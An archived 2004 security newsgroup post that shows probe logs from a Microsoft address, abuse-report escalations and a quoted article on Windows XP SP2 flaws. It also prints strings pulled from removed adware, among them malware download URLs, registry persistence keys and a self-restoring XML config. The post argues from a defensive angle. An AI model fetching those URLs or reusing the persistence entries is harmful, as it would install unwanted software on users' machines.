<Sat Nov 13 01:29:18 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:29:21 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:29:28 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:02 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:05 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:41:11 2004> 207.46.98.138:3507 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:26 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:29 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:52:35 2004> 207.46.98.138:3326 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
Reading the report, we find other hosts which have been/are being targeted:
Netblock: Number of IP's targeted:
- ----------------------------------------
216.83.x.x 7
134.29.x.x 5
192.168.x.x 1
134.29.x.x 1
They have had several notices since Oct:
http://www.mynetwatchman.com/ListIncidentActivity.asp?IncidentId=116661437
4 12 Nov 2004 17:44:51 Re-escalation sent to: abuse@microsoft.com
3 5 Nov 2004 13:31:29 Standard escalation email sent to: abuse@microsoft.com
2 21 Oct 2004 05:44:17 Re-escalation sent to: abuse@microsoft.com
The incident report at http://www.mynetwatchman.com/LID.asp?IID=116661437 lists
"HTTP Possible Nachi/CodeRed/Nimda" under "Issue Description". I heard MS is making an anti-virus
software now.
It gets better. Then this article, recently released:
"Ten new security holes in Windows XP Service Pack 2 have been discovered, so
get ready to insert new patches into your patch management schedule.
Microsoft recently announced their Security Bulletin Advance Notification
Program, which gives administrators a several days advance notice of
upcoming patches, however these new security holes were announced by
security product maker Finjan Software.
Finjan said their Malicious Code Research Center discovered the new
vulnerabilities, at least some of which are very dangerous. A spokesperson
for the company said "Finjan has provided Microsoft with full technical
details concerning the vulnerabilities [... ]and has been assisting
Microsoft to patch these holes. In order to prevent the creation of
malicious viruses and worms, Finjan will not release any
technical details about these vulnerabilities until they are fully patched
by Microsoft."
Shlomo Touboul, CEO and Founder of Finjan Software, said "Windows XP SP2
operating system is a continuation of the same Windows XP Operating System
and Windows Kernel. All Windows versions have been developed with
requirements for highest backward compatibility and open architecture,
with maximum productivity and ease of use. In addition, Windows applications
typically run with administrative permission with full and unlimited
access to computer resources."
"This, together with the emerging technology of mobile code has created a
situation in which active content travels freely over the web and gains
full control of host computers. These fundamentals create a green field for
hackers shown by constantly increasing attacks and damage over the last
few years. A security patch of Windows operating system without changing the
rules of the game will not be enough to fight the recent complex malicious
code attacks such as Scob, Mydoom, and others. End users and Enterprises
must add an independent security layer that is not dependent on the above
fundamentals. Application level behavior blocking is the leading technology
designed to immunize systems from both known and unknown vulnerabilities
and exploits; viruses, worms, Trojans, spyware, phishing and other threats,"
Touboul continued.
The vulnerabilities discovered at Finjan could allow attackers to
"silently and remotely" take control over an affected system when a user visits a
malicious Web page. As you well know, enticing someone to visit a Web page
is relatively easy to do.
The company outlined several scenarios to better explain the risks:
* Hackers can remotely access users' local files Windows(R) XP SP2 is
designed to deny access to a local file in the course of Internet
browsing. Therefore, any attempt by a remote web page to access a
local file in any way other than downloading a file, is denied. Finjan has
shown that this feature can be remotely compromised by hackers.
* Hackers can switch between Internet Explorer Security Zones to obtain
rights of local zone Internet Explorer uses the notion of security
zones to differentiate between mobile codes by their origin. In this way,
for example, the permissions of files running from the local hard drive
are much higher than the permissions of code downloaded from the Internet.
Finjan has shown that it is possible to elevate the privilege level of
mobile code downloaded from the Internet. By gaining additional
privileges, the remote code could read, write and execute files on the
user's hard drive.
* Hackers can bypass SP2's notification mechanism on the download and
execution of EXE files and therefore download files without any
warning or notification One of the mechanisms that have been implemented in
SP2 is the verification of the download and the execution of content
arriving from the Internet. This mechanism is implemented by three new
features - an information bar inside Internet Explorer which filters
and blocks unauthorized operations performed by web pages, a file download
dialog which requires the user's confirmation for file save and
execution operations, and
an execution verification dialog. These features are important to
prevent unauthorized silent "drive-by" installations of malicious
software."
This just doesn't happen to any other OS:
http://isc.sans.org/diary.php?date=2004-07-23
Some ascii strings examples of this fine programming
(from several files removed from a Win XP SP1 machine recently):
The now famous 180Solutions (after a visit Windowsupdate and this issue
was supposedly patched):
open
/boom_ver=
/boom_path=
/did=
Starting Executable................................
Could not start downloaded executable.
Starting Executable...
Could not write the target file.
Could not create the target file.
Downloading Signed File..
Contacting Server...............................
Contacting Server..
180search Assistant
EXE:
ExeDeleteEvent
PID:
"%s" PID:%d EXE:"%s"
Software\Microsoft\Windows\CurrentVersion\Run
Software\180solutions\msbb
Software\180solutions\msbb\Placements
nCASE
msbb
Log:
Log:
Deleted previous log
Settings:
boomdb.txt
This one featured in the URL above:
SOFTWARE\E2G
http://prutect.com/pi.exe
\pi1.exe
Bad url
lastCheck
lastBuild
\IeBHOs.dll
\IeBHOs.new
installDir
build
merchants
e2give.com
&popup=
popup
go/check?build=
checkStarted
IeBHOs.Control
{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}
CLSID
IeBHOs.Control.1
oÖWriteFile
CreateFile
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKCC
In order to finalize removal, you must reboot your computer.
E2Give Plug-in
NoRemove
askearth.com/go/show?t=e2give
\data.new
RegSetValueExA
RegDeleteKeyA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteValueA
URLDownloadToFileA
DllRegisterServer
IeBHOs 1.0 Type LibraryWWW
Control BHO ClassW
Created by MIDL version 6.00.0361 at Mon Oct 25 17:59:51 2004
¡}AWW
ÿÿÿÿ0
HKCR {
NoRemove AppID {
'{3B99F202-145A-4E5A-AC7B-88A36910BF5E}' = s 'IeBHOs'
'IeBHOs.DLL' {
val AppID = s '{3B99F202-145A-4E5A-AC7B-88A36910BF5E}'
HKLM {
NoRemove Software {
NoRemove Microsoft {
NoRemove Windows {
NoRemove CurrentVersion {
NoRemove Explorer {
NoRemove 'Browser Helper Objects' {
ForceRemove '{3643ABC2-21BF-46B9-B230-F247DB0C6FD6}'
}
This one regenerates itself if you try to remove it (Agent.I). Note
the name of the server; how appropriate ;) :
<?xml version="1.0" ?>
<poll interval="60000" recoveryinterval="86400000" configtype="test">
<restoreIf url="http://static.callinghome.biz/download/cabs/THNALL1R/thnall1r.exe" hive="HKLM" key="Software\Vendor\xml">
<missing>
<reg hive="HKLM" key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000020DD-C72E-4113-AF77-DD56626C6C42}" />
</missing>
DCOM. IFRAME. Adobe "steam" issue. CHM. Lsass. gdiplus. It never ends... How
can this be secure? And last- someone having an opionion different from yours,
no matter how strongly they feel about it, is not a "troll". This is a group
which discusses matters related to comp. security and that is what that was.
People will use what they will; if someone makes a statement which I feel is
incorrect, then I will attempt to prove it wrong with the facts I have and
what I know, have seen, or done.
-- --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++
- Next message: jayjwa: "Re: Anonymous surfing"
- Previous message: jayjwa: "Re: Antivirus AntiSpyware combo program?"
- In reply to:(deleted message) Leythos: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Next in thread: Leythos: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Reply: Mike: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Reply: Lars M. Hansen: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
